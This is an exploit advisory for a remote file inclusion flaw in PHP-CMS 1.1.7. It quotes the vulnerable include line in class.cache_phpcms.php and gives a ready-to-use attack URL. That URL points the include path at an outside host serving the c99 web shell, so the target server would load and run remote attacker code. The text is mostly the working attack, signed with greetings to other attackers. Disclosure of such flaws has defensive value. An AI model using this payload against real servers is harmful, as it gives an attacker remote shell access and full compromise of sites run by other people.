PHP-CMS version 1.1.7 suffers from a remote file inclusion vulnerability.
a0801fa42646e91873484265479b98cccff1437d6bbb0dbe15cdad8d4b8ee2a8
#phpcms <=- 1.1.7 Remote File Inclusion
#Download Source : #http://phpcms.de/files/phpcms_1_1_7.zip
#Found By : b0rizQ
#Greetz : Nuck3r + Crack_Man + Red_Casper + RaChidox + Broken-Proxy + S4mi
_____________________________________________________
File : class.cache_phpcms.php
--Bugs--------------------------------------
include ($PHPCMS_INCLUDEPATH.'/language.'.$DEFAULTS->LANGUAGE );
if ( $DEFAULTS->STATS == 'on' )
--------------------------------------------
Exmple And Methode Exploit :
http://www.traget.***/cms/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=http://b0rizq.by.ru/c99.txt?
""""""""""www.b0rizQ.Biz"""""""""""""""""""""